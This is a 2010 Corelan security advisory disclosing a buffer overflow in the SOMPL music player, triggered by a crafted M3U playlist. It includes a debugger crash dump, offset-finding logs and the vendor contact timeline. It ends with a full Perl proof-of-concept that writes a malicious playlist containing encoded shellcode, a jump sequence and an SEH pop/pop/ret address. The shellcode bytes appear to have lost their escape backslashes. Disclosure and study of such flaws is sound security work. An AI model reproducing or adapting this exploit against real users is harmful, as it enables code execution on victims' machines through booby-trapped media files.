CORELAN-10-006.txt
Posted on 20 January 2010
|------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------| Advisory : CORELAN-10-006 Disclosure date : 20 January 2010 http://www.corelan.be:8800/index.php/forum/security-advisories/ 0x00 : Vulnerability information -------------------------------- [*] Product : S.O.M.P.L player [*] Version : 1.0 [*] Vendor : George Fesalides [*] URL : http://sourceforge.net/projects/somplmp3/files/ [*] URL2 : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html [*] Platform : Windows [*] Type of vulnerability : Buffer Overflow [*] Risk rating : Medium [*] Issue fixed in version : ??? [*] Vulnerability discovered by : Rick2600 [*] Greetings to : corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r 0x01 : Vendor description of software ------------------------------------- S.O.M.PL. Is a Simple Open Music Player that plays mp3 files. This player loads mp3 files and stores them in a playlist. It includes features such as random tracks selection,tracks repetition,loading playlist, saving playlist. 0x02 : Vulnerability details ---------------------------- The discovered vulnerability allows an attacker to send a crafted malicious playlist (M3U) whereby the user could be tricked into executing unauthorized commands. In order for the vulnerability to be triggered, an end user must be tricked into loading a malicious playlist (M3U) on SOMPL. Crash information : (dc.e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=41414141 ecx=00000000 edx=00000000 esi=0012eb48 edi=00000000 eip=40004ae4 esp=0012eb18 ebp=0012fb4c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 VCL50!SystemLStrClr$qqrr17SystemAnsiString: 40004ae4 8b10 mov edx,dword ptr [eax] ds:0023:41414141=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:000> !exchain 0012eb2c: VCL50!StdctrlsTRadioButtonCNCommand$qqrr19MessagesTWMCommand+e6 (40048762) 0012fb7c: 41414141 Invalid exception stack at 41414141 !pvefindaddr findmsp : Log data 0BADF00D ------------------------------------------------------------------------- 0BADF00D Searching for metasploit pattern references 0BADF00D ------------------------------------------------------------------------- 0BADF00D [1] Checking register addresses and contents 0BADF00D ============================================ 0BADF00D Register EDI points to Metasploit pattern at position 0 0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096 0BADF00D Register EBP points to Metasploit pattern at position 4100 0BADF00D Register EDX points to Metasploit pattern at position 0 0BADF00D Register EBX is overwritten with Metasploit pattern at position 4096 0BADF00D Register ESI points to Metasploit pattern at position 0 0BADF00D [2] Checking seh chain 0BADF00D ====================== 0BADF00D - Checking seh chain entry at 0x0012eb2c, value 40048762 0BADF00D - Checking seh chain entry at 0x0012fb7c, value 46346946 0BADF00D => record is overwritten with Metasploit pattern at position 4152 0BADF00D ------------------------------------------------------------------------- 0x03 : Vendor communication --------------------------- [*] 28 dec 2009 : Vendor contacted - no reply [*] 09 jan 2010 : Vendor contacted again - still no reply [*] 20 jan 2010 : Public disclosure 0x04 : Exploit/PoC ------------------ # Exploit Title : SOMPL Player Buffer Overflow # Date : 20 January 2010 # Author : Rick2600 (ricks2600[at]gmail{dot}com) # Bug found by : Rick2600 (ricks2600[at]gmail{dot}com) # Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html # Version : 1.0 # Issue fixed in: ??? # OS : Windows # Tested on : XP SP2 and SP3 En # Type of vuln : Buffer Overflow # Greetz to : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r # # Script provided 'as is', without any warranty. # Use for educational purposes only. # # # Code : print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print "[+] SOMPL Player Buffer Overflow - SEH Overwrite "; $header = "#EXTM3U #EXTINF:"; #Shellcode: x86/alpha_mixed( MsgBox ) $shellcode = "x89xe7xdbxcfxd9x77xf4x59x49x49x49x49x49x49" . "x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" . "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" . "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" . "x75x4ax49x48x6bx44x62x50x56x46x51x4bx70x42" . "x44x4cx4bx43x70x46x50x4bx35x4bx70x51x68x44" . "x4cx4ex6bx47x30x44x4cx4cx4bx50x70x47x6cx4c" . "x6dx4cx4bx43x70x46x68x4ax4bx46x69x4cx4bx43" . "x70x44x74x4ex6dx43x70x51x6cx4cx4bx47x30x45" . "x6cx43x6ex4fx33x48x6bx45x39x45x30x4cx4bx42" . "x4cx51x34x51x34x4ex6bx43x75x47x4cx4ex6bx51" . "x44x47x75x43x48x46x61x49x7ax4ex6bx50x4ax47" . "x68x4ex6bx42x7ax51x30x43x31x4ax4bx4ax43x50" . "x34x47x39x4cx4bx44x74x4cx4bx43x31x48x6ex50" . "x31x4bx4fx45x61x49x50x4bx4cx4cx6cx4dx54x49" . "x50x44x34x43x37x4ax61x48x4fx46x6dx46x61x48" . "x47x48x6bx4bx44x45x6bx43x4cx44x64x46x48x50" . "x75x4dx31x4cx4bx43x6ax51x34x47x71x48x6bx50" . "x66x4cx4bx44x4cx50x4bx4cx4bx51x4ax45x4cx46" . "x61x4ax4bx4cx4bx43x34x4cx4bx46x61x48x68x4d" . "x59x47x34x46x44x45x4cx50x61x4fx33x4ex4dx42" . "x70x46x32x48x68x4fx5ax4bx4fx4bx4fx49x6fx4e" . "x69x43x37x51x54x51x54x47x34x43x74x43x74x47" . "x34x43x74x42x64x47x37x47x37x50x47x42x67x50" . "x39x48x4ex51x65x4bx56x4ax63x42x6cx50x4cx42" . "x6cx42x6cx4dx59x4bx55x4bx58x45x38x4bx4fx49" . "x6fx49x6fx4cx49x4bx72x48x6bx45x4cx51x4ex4c" . "x4dx51x6dx45x54x4ex69x4cx31x4bx30x49x51x46" . "x6cx48x68x4fx38x49x6fx49x6fx4bx4fx48x6bx47" . "x65x45x61x49x42x51x49x4cx48x42x71x42x34x43" . "x61x42x72x4bx4fx50x54x44x64x44x4cx4ax48x4b" . "x6fx4bx4fx4bx4fx4bx4fx51x47x51x6fx51x39x42" . "x42x48x68x48x66x4bx4fx49x6fx49x6fx47x33x42" . "x4fx43x42x51x75x42x4cx50x61x42x4ex51x30x50" . "x54x51x75x43x51x50x6dx51x30x44x6dx47x50x42" . "x70x42x77x50x4ex50x45x42x64x42x78x41x41"; $filename = "somplPOC.m3u"; print "[+] Check: $filename "; $buffer = "x90" x 5; $buffer .= $shellcode; $buffer .= "B" x (4138 - length($shellcode)); $buffer .= "xE9xCDxEFxFFxFF"; $buffer .= "xEBxF9x90x90"; $buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll open (FILE, ">$filename"); print FILE $buffer; close(FILE);
